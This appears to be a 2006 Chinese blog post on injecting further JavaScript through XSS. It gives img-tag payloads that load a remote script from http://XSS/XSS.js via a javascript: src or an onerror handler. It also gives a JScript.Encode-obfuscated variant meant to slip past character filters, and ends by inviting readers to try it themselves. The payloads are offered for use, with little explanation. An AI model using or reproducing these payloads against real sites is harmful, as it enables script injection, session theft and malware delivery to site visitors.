首页 > 技术文章 > 在XSS中如何再插JS

在XSS中如何再插JS

2006年10月9日 发表评论 69 views 阅读评论

来自:s0n9'5 B1o9

在XSS中如何再插JS

<img src="javascript:try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}"></img>

字符过滤怎么办?用Encode加密后就无敌了~

未加密前

<img src='#' XSS="try{var s=document.createElement('script');s.src='http://XSS/XSS.js';document.body.appendChild(s);}catch(e){}" "onerror"="window.execSript(decodeURI(this.XSS),'Jscript.Encode');" >

加密后

<img src='#' XSS="#@~^bQAAAA==OMX`7lMP/{NK^Es+UYcm.nmY+As+s+xDcv/1DbwOBbIkRdD1xB4YO2=zzpjUzp?U N/vpNKmEs+ or(W[Xcl22xN;4k^N`kbI81lDm4`nbP8XCcAAA==^#~@ " "onerror"="window.execSript(decodeURI(this.XSS),'Jscript.Encode');" >

嘿嘿~刺激吧~再怎么用你自己实验吧.

相关文章

分类: 技术文章 标签:
  1. 本文目前尚无任何评论.
  1. 本文目前尚无任何 trackbacks 和 pingbacks.